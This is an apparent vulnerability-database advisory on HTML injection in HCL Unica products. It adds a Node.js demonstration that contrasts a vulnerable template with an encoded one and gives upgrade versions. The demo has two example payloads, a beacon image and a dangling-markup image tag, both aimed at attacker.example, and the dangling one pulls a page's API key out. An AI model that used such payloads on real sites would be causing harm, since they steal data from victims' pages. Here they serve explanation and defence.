HCL Unica Products HTML Injection Vulnerability Leading to Data Exfiltration

Vulnerability

A vulnerability allowing HTML injection has been identified in multiple HCL Unica products, including Unica Platform, Audience Central, Segment Central, Centralised Offer Management, Contact Central, Journey, Plan, Campaign, and InteractDT. The affected web applications do not properly validate or encode user-supplied input before placing it in a webpage, so an attacker can inject arbitrary HTML markup into the rendered page. When a victim loads that page, the browser renders the injected markup and automatically requests any external resources it references (for example, an image hosted on an attacker-controlled server). Those unintended requests are the exfiltration path: they carry information from the victim's page or session to the attacker's server.

Impact

An attacker who can get injected HTML rendered in a victim's session can make the victim's browser issue requests to an external server of the attacker's choosing and use those requests to exfiltrate data from the page. No script execution is required: plain markup that references an external resource is enough to trigger the request.
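The following is an added example, not code from HCL or from the affected products. It shows, in a small Node.js script, the general mechanism the advisory describes: a server-side template that interpolates user input into markup without encoding, an attacker-supplied `<img>` whose `src` points at an attacker-controlled host, and a hardened version of the same template that encodes every interpolated value. A minimal model of the browser's attribute tokenizer lists which URLs the page would fetch on load; it also covers the dangling-markup variant (an unterminated `src="` that swallows the markup after it), which goes slightly beyond the single-element case the advisory states. The attacker host, the API key, the template and the payloads are all constructed for the demonstration.

```javascript
// Added example, not HCL's code. Models HTML injection leading to outbound
// requests: user input interpolated into markup without encoding lets an
// attacker add an <img> whose src points at a host they control; the
// victim's browser requests it on page load, and the request can carry
// page content out. All hosts, keys and templates below are constructed.

const API_KEY = "ak_constructed_123";           // constructed sample secret on the page
const ATTACKER = "https://attacker.example";    // hypothetical attacker-controlled host

// Vulnerable rendering: the display name goes into the page verbatim.
function renderVulnerable(displayName, apiKey) {
  return `<p>Welcome, ${displayName}</p>` +
         `<p>Your API key: ${apiKey}</p>` +
         `<a href="/settings">Settings</a>`;
}

// Contextual output encoding for HTML text and double/single-quoted attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: every interpolated value is encoded, including the
// trusted-looking ones, so no input can open a new element.
function renderHardened(displayName, apiKey) {
  return `<p>Welcome, ${escapeHtml(displayName)}</p>` +
         `<p>Your API key: ${escapeHtml(apiKey)}</p>` +
         `<a href="/settings">Settings</a>`;
}

// Minimal model of what a browser fetches with no script running: src/href on
// auto-loading elements. A quoted attribute value runs until the matching
// quote, so an unterminated value swallows the markup that follows it
// (dangling markup injection). Close enough to the HTML tokenizer for this
// demonstration; it is not a full parser.
const AUTO_LOAD =
  /<(?:img|script|iframe|link)\b[^>]*?\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

function autoLoadedUrls(html) {
  const urls = [];
  for (const m of html.matchAll(AUTO_LOAD)) urls.push(m[1] ?? m[2] ?? m[3]);
  return urls;
}

// Only cross-origin absolute URLs reach an external server.
function leakedRequests(html) {
  return autoLoadedUrls(html).filter((u) => /^(?:https?:)?\/\//i.test(u));
}

// Two constructed payloads: a plain beacon that reveals the visit and the
// Referer, and a dangling-markup variant whose unterminated src captures
// everything up to the next double quote in the page (here, the API key).
const BEACON_PAYLOAD = `<img src="${ATTACKER}/beacon">`;
const DANGLING_PAYLOAD = `<img src="${ATTACKER}/x?`;

function demo() {
  for (const [label, payload] of [["beacon", BEACON_PAYLOAD], ["dangling", DANGLING_PAYLOAD]]) {
    console.log(`${label} / vulnerable:`, leakedRequests(renderVulnerable(payload, API_KEY)));
    console.log(`${label} / hardened: `, leakedRequests(renderHardened(payload, API_KEY)));
  }
}
demo();
```

Run with `node`. For the vulnerable template the dangling payload yields one outbound URL to `attacker.example` whose query string contains the constructed API key; the hardened template yields none for either payload because the `<` and `"` are encoded before they reach the page. Two caveats a practitioner should keep in mind: the tokenizer model is deliberately simple (real browsers also auto-load `<video>`, `<audio>`, `<object>` and CSS `url()` references, and Chromium has shipped a mitigation that refuses to fetch URLs containing both a raw newline and a `<` character, which this model does not implement), and the fix is the output encoding in `renderHardened` applied at every sink, not reliance on browser-side mitigations or a blocklist of tag names.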

Remediation

Upgrade to HCL Unica 12.1.11 or 25.1.1.0.1 (25.1.1_IF01) to address this vulnerability. The fix build for 25.1.1.0.1 is available on the HCL Software Downloads site.

Added: Mar 17, 2026, 1:18 PM
Updated: Mar 17, 2026, 1:18 PM

Vulnerability Rating

Custom Algorithm
spread: 2.6
impact: 0.4
exploitability: 6.0
remediation: 7.7
relevance: 4.0
threat: 0.0
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.